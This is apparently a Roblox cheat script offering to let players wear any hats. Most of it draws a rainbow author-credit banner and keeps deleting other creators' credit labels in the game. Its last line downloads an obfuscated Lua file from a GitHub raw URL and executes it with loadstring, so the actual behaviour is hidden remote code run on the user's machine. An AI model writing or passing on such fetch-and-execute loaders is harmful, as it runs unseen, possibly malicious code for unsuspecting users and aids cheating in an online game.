--YOU CAN WEAR ANY HATS FR --remade by Scripterblabla --This script was made by Scripterblabla - do not steal / Ok? -- === this script is remade by Scripterblabla so don't steal it=== local player = game.Players.LocalPlayer local gui = Instance.new("ScreenGui") gui.Name = "ScripterCreditGui" gui.Parent = player:WaitForChild("PlayerGui") gui.ResetOnSpawn = false gui.IgnoreGuiInset = true local frame = Instance.new("Frame") frame.Size = UDim2.new(1, 0, 0.06, 0) frame.Position = UDim2.new(0, 0, 0, 0) frame.BackgroundTransparency = 0.6 frame.BackgroundColor3 = Color3.fromRGB(30, 30, 30) frame.BorderSizePixel = 0 frame.Parent = gui local creditLabel = Instance.new("TextLabel") creditLabel.Size = UDim2.new(1, 0, 1, 0) creditLabel.BackgroundTransparency = 1 creditLabel.Text = "Credit by Scripterblabla" creditLabel.TextColor3 = Color3.fromRGB(0, 255, 0) creditLabel.TextScaled = true creditLabel.Font = Enum.Font.SourceSansBold creditLabel.TextStrokeTransparency = 0.4 creditLabel.TextStrokeColor3 = Color3.fromRGB(0, 0, 0) creditLabel.Parent = frame -- Rainbow cycle spawn(function() while true do for hue = 0, 1, 0.004 do creditLabel.TextColor3 = Color3.fromHSV(hue, 1, 1) wait(0.035) end end end) -- === have fun === spawn(function() wait(3) -- Sigma dude(scripterblabla) local function cleanUnwanted() for _, obj in ipairs(game:GetDescendants()) do if obj:IsA("TextLabel") or obj:IsA("TextButton") then local txt = obj.Text:lower() if txt:find("credit x") or txt:find("creditx") or txt == "credit x" then obj.Visible = false obj:Destroy() -- hmmm suspicious print("Removed unwanted 'Credit X' label!") end elseif obj:IsA("BillboardGui") or obj:IsA("SurfaceGui") then -- Check for floating credits attached to parts if obj:FindFirstChildWhichIsA("TextLabel") then local label = obj:FindFirstChildWhichIsA("TextLabel") if label and label.Text:lower():find("credit Scripterblabla") then obj:Destroy() end end end end end cleanUnwanted() -- Run once -- so sigma while wait(5) do cleanUnwanted() end end) -- Console backup print("Credit by Scripterblabla - unwanted credits hidden!") -- ═══════════════════════════════════════════════════════════════ -- remember don't steal it 🥀 -- ═══════════════════════════════════════════════════════════════ loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_8u7A6D92KJWJXgB4btM3lJNPDy2mCi61S191KbGF2EfX9621qbXQg0tBivwEi0Kr.lua.txt'),true))()